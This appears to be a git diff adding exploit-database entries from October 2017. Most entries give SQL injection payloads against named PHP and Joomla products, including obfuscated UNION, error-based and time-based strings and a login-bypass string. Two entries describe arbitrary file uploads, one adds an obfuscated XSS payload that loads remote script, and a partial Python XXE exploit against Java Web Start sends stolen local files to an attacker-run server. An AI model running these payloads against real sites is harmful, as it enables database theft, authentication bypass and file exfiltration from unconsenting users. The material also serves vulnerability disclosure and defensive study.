# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
#
# http://localhost/[PATH]/admin
#
# Email: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #

32
platforms/php/webapps/43088.txt Executable file
View file

@ -0,0 +1,32 @@
# # # # #
# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.softdatepro.com/
# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959
# Demo: http://www.ss.softdatepro.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15971
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
#
# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
#
# http://localhost/[PATH]/admin
#
# Email: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #

34
platforms/php/webapps/43089.txt Executable file
View file

@ -0,0 +1,34 @@
# # # # #
# Exploit Title: PHP CityPortal 2.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.phpcityportal.com/
# Software Link: http://www.phpcityportal.com/index.php
# Demo: http://phpcityportal.com/demo
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15970
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=news&nid=[SQL]
#
# Parameter: cat (GET)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
# Payload: cat=1' OR NOT 6616=6616#
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: cat=1' OR SLEEP(5)-- cCQQ
#
# Etc..
# # # # #

107
platforms/php/webapps/43090.txt Executable file
View file

@ -0,0 +1,107 @@
# # # # #
# Exploit Title: PG All Share Video 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.pilotgroup.net/
# Software Link: http://www.allsharevideo.com/features.php
# Demo: http://demo.allsharevideo.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15969
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/search/tag/[SQL]
# http://localhost/[PATH]/friends/index/1[SQL]
# http://localhost/[PATH]/users/profile/1[SQL]
# http://localhost/[PATH]/video_catalog/category/1[SQL]
#
# 'ANd(/*!06666seleCt+*/1/*!06666frOm*/(/*!06666seleCt*/%20COunt(*),/*!06666COnCAt*/((seleCt(seleCt+COnCAt(CAst(dAtAbAse()As%20ChAr),0x7e,0x496873616E53656e63616e))%20frOm%20infOrmAtiOn_sChemA.tAbles%20where%20tAble_sChemA=dAtAbAse()%20limit%200,1),flOOr(rAnd(0)*2))x%20frOm%20infOrmAtiOn_sChemA.tAbles%20grOup%20by%20x)A)%20AnD%20''='
#
# Parameter: #1* (URI)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND 2686=2686 AND 'UsmZ'='UsmZ
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND (SELECT 4572 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(4572=4572,1))),0x716b627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iudq'='iudq
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND SLEEP(5) AND 'iczN'='iczN
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 3 columns
# Payload: http://localhost/[PATH]/search/tag/VerAyari' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6a71,0x4b6e4a524653614e47727a4f4464575253424c4d6c544f6b6a78454e4a756c75794d6a7765697269,0x716b627871)-- mAFc
#
# Parameter: #1* (URI)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: http://localhost/[PATH]/channels/category/7' AND 4239=4239 AND 'oXBo'='oXBo
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: http://localhost/[PATH]/channels/category/7' AND (SELECT 4458 FROM(SELECT COUNT(*),CONCAT(0x7170626b71,(SELECT (ELT(4458=4458,1))),0x7176787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JBxT'='JBxT
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 3 columns
# Payload: http://localhost/[PATH]/channels/category/7' UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x574355636a666d516c4d437a78696a5a6243555a46486f494a45455a6c49574e577765704a496367,0x7176787071)-- kJpu
#
# Parameter: #1* (URI)
# Type: boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload: http://localhost/[PATH]/friends/index/11' RLIKE (SELECT (CASE WHEN (2135=2135) THEN 11 ELSE 0x28 END))-- SVFb
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: http://localhost/[PATH]/friends/index/11' AND (SELECT 1564 FROM(SELECT COUNT(*),CONCAT(0x7170786a71,(SELECT (ELT(1564=1564,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DoZE
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: http://localhost/[PATH]/friends/index/11' OR SLEEP(5)-- Maum
#
# Parameter: #1* (URI)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: http://localhost/[PATH]/users/profile/1' AND 3612=3612 AND 'wNwI'='wNwI
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: http://localhost/[PATH]/users/profile/1' AND (SELECT 3555 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT (ELT(3555=3555,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XrEj'='XrEj
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: http://localhost/[PATH]/users/profile/1' AND SLEEP(5) AND 'XZVf'='XZVf
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 3 columns
# Payload: http://localhost/[PATH]/users/profile/1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767671,0x7a7a646e536849756f717771546e4547497549465459754f65636946535375667577596755616876,0x717a7a7a71)-- UaUA
#
# Parameter: #1* (URI)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: http://localhost/[PATH]/video_catalog/category/1' AND 4550=4550 AND 'SAmI'='SAmI
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: http://localhost/[PATH]/video_catalog/category/1' AND (SELECT 4089 FROM(SELECT COUNT(*),CONCAT(0x716a6a7171,(SELECT (ELT(4089=4089,1))),0x716b786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PTze'='PTze
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: http://localhost/[PATH]/video_catalog/category/1' AND SLEEP(5) AND 'ptLy'='ptLy
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 3 columns
# Payload: http://localhost/[PATH]/video_catalog/category/1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a7171,0x4c5a694b4948566c59527663484b7a466c76725746684863506159646973414749617966634d5145,0x716b786a71)-- zDQK
#
# Etc..
# # # # #

40
platforms/php/webapps/43091.txt Executable file
View file

@ -0,0 +1,40 @@
# # # # #
# Exploit Title: MyBuilder Clone 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.contractorscripts.com/
# Software Link: http://order.contractorscripts.com/
# Demo: http://demo.contractorscripts.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15968
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/phpsqlsearch_genxml.php?subcategory=[SQL]
#
# 1'++aND(/*!09999sELeCT*/+0x30783331+/*!09999FrOM*/+(/*!09999SeLeCT*/+cOUNT(*),/*!09999CoNCaT*/((sELEcT(sELECT+/*!09999CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
#
# Parameter: subcategory (GET)
# Type: boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload: subcategory=1' RLIKE (SELECT (CASE WHEN (9811=9811) THEN 1 ELSE 0x28 END))-- gzxz
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: subcategory=1' AND (SELECT 1213 FROM(SELECT COUNT(*),CONCAT(0x7162626a71,(SELECT (ELT(1213=1213,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qHTp
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: subcategory=1' OR SLEEP(5)-- RvzR
#
# Etc..
# # # # #

29
platforms/php/webapps/43092.txt Executable file
View file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Mailing List Manager Pro 3.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.vote-pro.com/
# Software Link: http://www.mailing-manager.com/demo.html
# Demo: http://www.mailing-manager.com/demo-gold/
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15967
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin/users/?sort=login&edit=[SQL]
#
# -2'++/*!03333UNION*/(/*!03333SELECT*/0x283129,0x283229,0x283329,/*!03333CONCAT_WS*/(0x203a20,USER()),0x283529,/*!03333CONCAT_WS*/(0x203a20,DATABASE()),/*!03333CONCAT_WS*/(0x203a20,VERSION()),0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429)--+-
#
# http://localhost/[PATH]/admin/template/?edit=[SQL]
#
# Etc..
# # # # #

34
platforms/php/webapps/43093.txt Executable file
View file

@ -0,0 +1,34 @@
# # # # #
# Exploit Title: Joomla! Component Zh YandexMap 6.1.1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://zhuk.cc/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-yandexmap/
# Demo: http://joomla.zhuk.cc/index.php
# Version: 6.1.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15966
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=[SQL]
#
# Parameter: placemarklistid (GET)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-8164) OR 5013=5013#
#
# Type: error-based
# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
# Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-1660) OR 1 GROUP BY CONCAT(0x71627a7871,(SELECT (CASE WHEN (6691=6691) THEN 1 ELSE 0 END)),0x716b7a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
#
# Etc..
# # # # #

34
platforms/php/webapps/43094.txt Executable file
View file

@ -0,0 +1,34 @@
# # # # #
# Exploit Title: Joomla! Component NS Download Shop 2.2.6 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: https://nswd.co/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/paid-downloads/ns-downloadshop/
# Demo: https://ds.nswd.co/
# Version: 2.2.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15965
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_ns_downloadshop&task=invoice.create&id=[SQL]
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: MySQL >= 5.0 boolean-based blind - Parameter replace
# Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT (CASE WHEN (5078=5078) THEN 5078 ELSE 5078*(SELECT 5078 FROM INFORMATION_SCHEMA.PLUGINS) END))
#
# Type: error-based
# Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
# Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT 2458 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2458=2458,1))),0x7178627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Etc..
# # # # #

34
platforms/php/webapps/43095.txt Executable file
View file

@ -0,0 +1,34 @@
# # # # #
# Exploit Title: Job Board Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.nicephpscripts.com/
# Software http://www.nicephpscripts.com/job_board_script.htm
# Demo: http://www.nicephpscripts.com/scripts/faqscript/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15964
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?nice_theme=[SQL]
#
# Parameter: nice_theme (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: nice_theme=2 AND 9686=9686
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: nice_theme=2 AND SLEEP(5)
#
# Etc..
# # # # #

40
platforms/php/webapps/43096.txt Executable file
View file

@ -0,0 +1,40 @@
# # # # #
# Exploit Title: iTech Gigs Script 1.21 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://itechscripts.com/
# Software Link: http://itechscripts.com/the-gigs-script/
# Demo: http://gigs.itechscripts.com/
# Version: 1.21
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15963
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/browse-scategory.php?sc=[SQL]
#
# -12c4ca4238a0b923820dcc509a6f75849b'++/*!08888UNIoN*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,(/*!08888SElEct*/+Export_sEt(5,@:=0,(/*!08888sElEct*/+count(*)/*!08888from*/(information_schEma.columns)whErE@:=Export_sEt(5,Export_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888column_namE*/,0xa3a,2)),@,2)),0x283829,0x283929,0x28313029)--+-
#
# http://localhost/[PATH]/service-provider.php?ser=[SQL]
#
# -9553'++/*!50000UNION*/+/*!50000SELECT*/+1,2,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
#
# Parameter: sc (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: sc=12c4ca4238a0b923820dcc509a6f75849b' AND 5747=5747 AND 'tzJH'='tzJH
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 10 columns
# Payload: sc=-5921' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7a71,0x74624c4f7167546e4676635467647269456244634147776d584b77796e4870674661646a7a44485a,0x717a6a7a71),NULL,NULL,NULL-- bjaB
#
# Etc..
# # # # #

26
platforms/php/webapps/43097.txt Executable file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: iStock Management System 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://ikodes.com/
# Software Link: https://codecanyon.net/item/istock-management-system/20405084
# Demo: http://project.ikodes.com/basicims/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15962
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users upload arbitrary file....
#
# Proof of Concept:
#
# http://localhost/[PATH]/user/profile
# http://localhost/[PATH]//assets/images/[FILE]
#
# Etc..
# # # # #

26
platforms/php/webapps/43098.txt Executable file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: iProject Management System 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://ikodes.com/
# Software Link: https://codecanyon.net/item/iproject-management-system/20483358
# Demo: http://project.ikodes.com/ikpms/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15961
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?cmd=agent&mod=true&ID=[SQL]
# http://localhost/[PATH]/index.php?cmd=client_master&mod=true&ID=[SQL]
#
# Etc..
# # # # #

43
platforms/php/webapps/43099.txt Executable file
View file

@ -0,0 +1,43 @@
# # # # #
# Exploit Title: Article Directory Script 3.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.yourarticlesdirectory.com/
# Software Link: http://www.yourarticlesdirectory.com/
# Demo: http://www.yourarticlesdirectory.com/livedemo.php
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15960
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/category.php?id=[SQL]
#
# 18++/*!02222UniOn*/+(/*!02222SeleCt*/+0x283129,/*!02222CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,0x283429,0x3078323833353239)--+-
#
# http://localhost/[PATH]/author.php?id=[SQL]
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: id=18 AND 8646=8646
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: id=18 AND SLEEP(5)
#
# Parameter: id (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: id=27 AND SLEEP(5)
#
# Etc..
# # # # #

32
platforms/php/webapps/43100.txt Executable file
View file

@ -0,0 +1,32 @@
# # # # #
# Exploit Title: Adult Script Pro 2.2.4 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.adultscriptpro.com/
# Software Link: http://www.adultscriptpro.com/order.html
# Demo: http://www.adultscriptpro.com/demo.html
# Version: 2.2.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15959
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/download/[SQL]
#
# VerAyari+aNd(SELeCT+1+FroM(SeLECT+CoUNT(*),CoNCat((SeLECT+(SELECT+CoNCat(CaST(VERSIoN()+aS+ChaR),0x7e,0x496873616E53656e63616e))+FroM+INFoRMaTIoN_SChEMa.TaBLES+LIMIT+0,1),FLooR(RaNd(0)*2))x+FroM+INFoRMaTIoN_SChEMa.TaBLES+GRoUP+BY+x)a)
#
# Parameter: #1* (URI)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: http://localhost/[PATH]/download/Verayari AND (SELECT 4247 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(4247=4247,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Etc..
# # # # #

29
platforms/php/webapps/43101.txt Executable file
View file

@ -0,0 +1,29 @@
<!--
# # # # #
# Exploit Title: D-Park Pro Domain Parking Script 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.domainzaar.com/
# Software Link: http://www.domainzaar.com/
# Demo: http://www.d-park-pro.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15958
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# # # # #
-->
<form id="loginform" action="http://localhost/[PATH]/admin/loginform.php" method="post">
<label for="form_username">Username:</label>
<input type="text" name="username" value="' UNION ALL SELECT 0x31,0x32,0x33,CONCAT(0x494853414e2053454e43414e)-- Ver Ayari" />
<label for="form_password">Password:</label>
<input type="password" name="password" id="form_password" />
<input name="login" value="Log In" type="submit">
</form>

27
platforms/php/webapps/43102.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Ingenious School Management System 2.3.0 - Arbitrary File Upload
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://iloveprograming.com/
# Software Link: https://www.codester.com/items/4945/ingenious-school-management-system
# Demo: http://iloveprograming.com/view/login.php
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15957
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
#
# The vulnerability allows an student,teacher upload arbitrary file....
#
# Proof of Concept:
#
# http://localhost/[PATH]/my_profile.php
# http://localhost/[PATH]/uploads/[FILE]
#
# Etc..
# # # # #

2
platforms/windows/remote/6880.html
View file

@ -104,7 +104,7 @@ function x() {
<br />
<br />
<br />
&lt;img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'&gt;
<img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'>
</body>
</html>

158
platforms/xml/webapps/43103.py Executable file
View file

@ -0,0 +1,158 @@
#!/usr/local/bin/python
"""
Oracle Java SE Web Start jnlp XML External Entity Processing Information Disclosure Vulnerability
Affected: <= v8u131
File: jre-8u131-windows-i586-iftw.exe
SHA1: 85f0de19845deef89cc5a29edebe5bb33023062d
Download: http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html
References: SRC-2017-0028 / CVE-2017-10309
Advisory: http://srcincite.io/advisories/src-2017-0028/
Vulnerability Details:
======================
Java SE installs a protocol handler in the registry as "HKEY_CLASSES_ROOT\jnlp\Shell\Open\Command\Default" 'C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe" -securejws "%1"'.
This can allow allow an attacker to launch remote jnlp files with little user interaction. A malicious jnlp file containing a crafted XML XXE attack to be leveraged to disclose files, cause a denial of service or trigger SSRF.
Notes:
======
- It will take a few seconds to fire.
- Some browsers will give a small, innocent looking popup (not a security alert), but IE/Edge doesn't at all.
Example:
========
saturn:~ mr_me$ ./poc.py
Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
mr_me 2017
(+) usage: ./poc.py <file>
(+) eg: ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
saturn:~ mr_me$ ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
mr_me 2017
(+) select your interface: lo0, gif0, stf0, en0, en1, en2, bridge0, p2p0, awdl0, vmnet1, vmnet8, tap0: vmnet8
(+) starting xxe server...
(+) have someone with Java SE installed visit: http://172.16.175.1:9090/
(!) firing webstart...
(!) downloading jnlp...
(!) downloading si.xml...
(+) stolen: Please%20refer%20to%20http://java.com/licensereadme
^C(+) shutting down the web server
saturn:~ mr_me$
"""
import sys
import socket
import fcntl
import struct
from random import choice
from string import lowercase
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
try:
import netifaces as ni
except:
print "(-) try 'pip install netifaces'"
sys.exit(1)
class xxe(BaseHTTPRequestHandler):
# stfu
def log_message(self, format, *args):
return
def do_GET(self):
if "leaked" in self.path:
print "(+) stolen: %s" % self.path.split("?")[1]
self.send_response(200)
self.end_headers()
elif self.path == "/":
print "(!) firing webstart..."
self.send_response(200)
self.end_headers()
message = """
<html>
<body>
<iframe src="jnlp://%s:9090/%s" style="width:0;height:0;border:0; border:none;"></iframe>
</body>
</html>
""" % (ip, path)
self.wfile.write(message)
self.wfile.write('\n')
elif "si.xml" in self.path:
print "(!) downloading si.xml..."
self.send_response(200)
self.end_headers()
message = """
<!ENTITY %% data SYSTEM "file:///%s">
<!ENTITY %% param1 "<!ENTITY &#x25; exfil SYSTEM 'http://%s:9090/leaked?%%data;'>">
""" % (file, ip)
self.wfile.write(message)
self.wfile.write('\n')
elif path in self.path:
print "(!) downloading jnlp..."
self.send_response(200)
self.end_headers()
message = """
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
